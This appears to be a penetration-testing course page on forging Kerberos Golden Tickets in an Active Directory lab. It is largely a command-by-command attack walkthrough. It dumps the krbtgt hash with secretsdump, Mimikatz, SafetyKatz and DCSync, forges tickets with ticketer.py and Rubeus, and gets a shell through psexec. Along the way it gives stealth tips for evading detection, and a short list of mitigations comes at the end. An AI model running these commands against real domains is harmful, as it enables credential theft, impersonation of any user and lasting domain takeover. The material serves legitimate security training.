8.1 - Golden Ticket

Golden Ticket Attack

A Golden Ticket is a forged Ticket Granting Ticket (TGT) that is signed and encrypted using the NTLM hash of the krbtgt account, making it appear as a legitimate TGT to the domain.

This means that the first step, the exchange of AS-REP and AS-REQ messages, is skipped. The TGT is crafted and the interaction with the KDC occurs only by exchanging the spoofed TGT with the TGS.

To create a golden ticket we need the following requirements:

1. Domain name

2. Domain SID

3. NTLM hash of the KRBTGT account

4. Username of user that we want to impersonate.

The requirement hardest to find is the NTLM hash of the KRBTGT account.

This attack permits to do lateral movement and take persistence.

With the krbtgt hash, it is possible to impersonate any user with any privileges, even from a machine that is not domain-joined.

1 - Obtain requirements to forge GT

Retrieve domain name

Using systeminfo command we can retrieve the domain name

Enumerate domain SID

lookupsid.py 'Administrator:P@$$W0rd'@192.168.57.9

or if we've already an access to machine (eg. reverse shell) we can execute whoami /user (excluding the last 4 chars, eg. -500): S-1-5-21-1954621190-1971745961-1283776715

User Name                  SID
========================== =============================================
dev-angelist\administrator S-1-5-21-1954621190-1971745961-1283776715-500

Extract NTLM hash of the KRBTGT account

We can use Impacket or Mimikatz (or a variant) on the Domain Controller as Domain Admin:

Impacket/secretsdump.py

secretsdump.py 'Administrator:P@$$W0rd'@192.168.57.9 -outputfile krb -user-status

and consider the 4th part of string after the third ':'

NTLM hash of the KRBTGT account is: d7ac4db5b820be57cc79f58f196a0e5b

Mimikatz

Download and extract Mimikatz:

iwr -uri https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip -Outfile mimikatz_trunk.zip
Expand-Archive -Path 'mimikatz_trunk.zip'
cd .\mimikatz_trunk\
cd .\x64\

and run it:

.\mimikatz.exe
privilege::debug
lsadump::lsa /inject /name:krbtgt

KRBTGT's NTLM: d7ac4db5b820be57cc79f58f196a0e5b

Using SafetyKatz:

C:\Users\Administrator\Documents\Tools\SafetyKatz.exe "lsadump::lsa /patch"

Alternatively, use DCSync to retrieve the AES keys without executing code on the DC (requires DA or replication rights):

C:\Users\Administrator\Documents\Tools\SafetyKatz.exe "lsadump::dcsync /user:dev-angelist\krbtgt" "exit"

---

2 - Forge a Golden Ticket

Ticketer/Impacket

Forge the golden ticket using ticketer.py an impacket's script suite, its duration end after 10 yeas from the moment of creation. The command below contain all requirements needed:

• Domain name -> dev-angelist.lab

• Domain SID -> S-1-5-21-1954621190-1971745961-1283776715

• NTLM hash of the KRBTGT account -> d7ac4db5b820be57cc79f58f196a0e5b

• Username of user that we want to impersonate -> Administrator

ticketer.py -nthash <HashValue> -domain-sid <SIDValue> -domain <DomainName> <Username>

ticketer.py -nthash d7ac4db5b820be57cc79f58f196a0e5b -domain-sid S-1-5-21-1954621190-1971745961-1283776715 -domain dev-angelist.lab Administrator

The ticket is saved in Administrator.ccache, if we need to use specific tools we need to convert it to kirbi format

export KRB5CCNAME=/home/kali/Documents/AD/Administrator.ccache
ticketConverter.py /home/kali/Documents/AD/Administrator.ccache Administrator.kirbi

In this case original .ccache format is compliant with Impacket.

Set ticket into the active cache

export KRB5CCNAME=/home/kali/Documents/AD/Administrator.ccache

Check active tickets using klist

#If you've not installed krb5 package, install it -> sudo apt install krb5-user
klist

Now, we need to syncronize clock and inject our ticket using psexec.py

cat /etc/hosts | grep dev-angelist.lab
sudo ntpdate -u 192.168.57.9
psexec.py -k -no-pass dev-angelist.lab/administrator@corp-dc.dev-angelist.lab

Rubeus

Use Rubeus to generate a forged TGT with attributes similar to a legitimate one:

C:\Users\Administrator\Documents\Tools\Rubeus.exe golden /aes256:<krbtgt AES256 hash> /sid:<domain SID> /ldap /user:Administrator /printcmd

This command triggers three LDAP queries to the DC to retrieve:

1. User account flags

2. Group membership, primary group ID, minpassage, maxpassage

3. NetBIOS name of the domain

If these values are already known, they can be manually specified to avoid unnecessary LDAP traffic (for better OPSEC).

krbtgt's aes256: e4acbc3756e23a3c9a2604068c4a3bcaad93f38bf5590aa16ee1b3c9431c3abb

C:\Users\Administrator\Documents\Tools\Rubeus.exe golden /aes256:e4acbc3756e23a3c9a2604068c4a3bcaad93f38bf5590aa16ee1b3c9431c3abb /sid:S-1-5-21-1954621190-1971745961-1283776715 /ldap /user:Administrator /printcmd

---

Key Options Explained

Option	Description
/aes256:<hash>	AES256 hash of the krbtgt account. Stealthier than NTLM.
/user	Username to impersonate.
/id	RID of the user (default for Administrator: 500).
/pgid	Primary Group ID (default: 513).
/groups	Group RIDs the user belongs to (e.g., 512 = Domain Admins).
/domain	Fully Qualified Domain Name (FQDN).
/sid	Domain SID.
/pwdlastset	Timestamp of the last password set (for the user).
/minpassage	Minimum password age (in days).
/logoncount	Number of logons for the user.
/netbios	NetBIOS name of the domain.
/dc	FQDN of the Domain Controller.
/uac	UserAccountControl flags (e.g., DONT_EXPIRE_PASSWORD).
/ptt	Injects the ticket directly into the current process.

To protect against this attacks:

• regularly rotate the KRBTGT password

• Enforce least privilege

• Enable additional authentication mechanisms like MFA

• Enbale LSA Protection (RunASPPL) on LSASS

Check if LSA Protection is activated:

Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunASPPL"

To enable LSA Protection:

reg add "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" /v RunAsPPL /t REG_DWORD /d 1 /f

Other References

• http://passing-the-hash.blogspot.com/2014/09/pac-validation-20-minute-rule- and.html

Labs

• Learning Object 8 lab